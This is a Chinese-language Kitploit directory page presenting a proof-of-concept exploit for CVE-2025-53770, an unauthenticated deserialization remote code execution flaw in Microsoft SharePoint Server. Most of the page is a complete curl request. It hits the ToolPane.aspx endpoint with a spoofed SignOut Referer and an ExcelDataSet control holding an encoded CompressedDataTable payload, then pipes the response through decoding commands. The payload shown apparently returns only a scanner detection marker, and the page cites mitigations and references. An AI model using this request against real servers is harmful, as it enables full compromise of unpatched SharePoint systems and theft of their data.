Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
cve-2025-53770 — 针对 Microsoft SharePoint Server (CVE-2025-53770) 中不安全反序列化漏洞的未认证远程代码执行概念验证利用程序,包含载荷提取与解码命令。 | Kitploit
工具/GitHubGitHub/0xray5c68616e37/cve-2025-53770
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队Payload 开发
GitHub0xray5c68616e37/cve-2025-53770

cve-2025-53770

针对 Microsoft SharePoint Server (CVE-2025-53770) 中不安全反序列化漏洞的未认证远程代码执行概念验证利用程序,包含载荷提取与解码命令。

查看仓库
311年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
网站
分享

CVE-2025-53770 SharePoint 反序列化 RCE 概念验证

严重 — 通过 Microsoft SharePoint Server 中的不安全反序列化实现未认证远程代码执行 (CVE-2025-53770)

描述

在本地部署的 Microsoft SharePoint Server 中,对不受信任数据的反序列化允许攻击者远程执行代码并危害系统。微软已注意到正在进行的利用活动,并正在准备全面的更新。请确保已实施 CVE 文档中的缓解措施。

  • 影响: 未认证的攻击者可以实现远程代码执行,导致系统完全沦陷。
  • 严重性: 严重

概念验证

以下 PoC 演示了攻击者如何通过存在漏洞的端点利用该漏洞提取并解码恶意载荷。

目标域名已特意替换为 reeaccated.com。

命令

curl -sk -X POST 'https://reeaccated.com/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx' \
  -H 'Referer: /_layouts/SignOut.aspx' \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  --data-urlencode 'MSOTlPn_Uri=https://reeaccated.com' \
  --data-urlencode 'MSOTlPn_DWP=
<%@ Register Tagprefix="Scorecard" Namespace="Microsoft.PerformancePoint.Scorecards" Assembly="Microsoft.PerformancePoint.Scorecards.Client, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %>
<%@ Register Tagprefix="asp" Namespace="System.Web.UI" Assembly="System.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" %>
<asp:UpdateProgress ID="UpdateProgress1" DisplayAfter="10" runat="server" AssociatedUpdatePanelID="upTest">
  <ProgressTemplate>
    <div class="divWaiting">
      <Scorecard:ExcelDataSet CompressedDataTable="H4sIAADEfmgA/4WRX2uzMBTG7/0Ukvs06ihjQb3ZbgobG1TYeO9OY6yBJpGTdHbfvudVu44x6FUkPn9+PEnK1nTdHuV8gE1P9uCCtKGFCBU7opNB9dpC4NYo9MF3kStvJen4rGKLZ4645bkU8c+c1Umalp33/0/62gGmC45pK9bA7qBZOpdI9OMrtpryM3ZR9RAee3B7HSpmXNAYdTuFTnGDVwvZKZiK9TEOUohxHFfj3crjXhRZlouPl+ftBMspIYJTVHlxEcQt13cdFTY6xHeEYdB4vaX7jet8vXERj8S/VeCcxicdtYrGuzf4OnhoSzGpftoaYykQ7FAXWbHm2T0v8qYoZP4g1+t/pbj+vyKIPxhKQUssEwvaeFpdTLOX4tfz18kZONVdDRICAAA=" DataTable-CaseSensitive="false" runat="server"></Scorecard:ExcelDataSet>
    </div>
  </ProgressTemplate>
</asp:UpdateProgress>' \
| grep -oP 'CompressedDataTable=&quot;\K[^&]+(?=&quot;)' \
| base64 -d 2>/dev/null \
| gzip -d 2>/dev/null \
| tee /tmp/sharepoint_decoded_payload.txt \
| grep -Ei 'IntruderScannerDetectionPayload|ExcelDataSet|divWaiting|ProgressTemplate|Scorecard'

输出

<Info>IntruderScannerDetectionPayload</Info>
图片

参考资料

  • 测试载荷实现
  • Code White 安全分析
  • 微软指南
  • NVD 条目

影响:
未认证的攻击者可以利用不安全的反序列化在 SharePoint Server 上实现远程代码执行,导致系统完全沦陷。

下载工具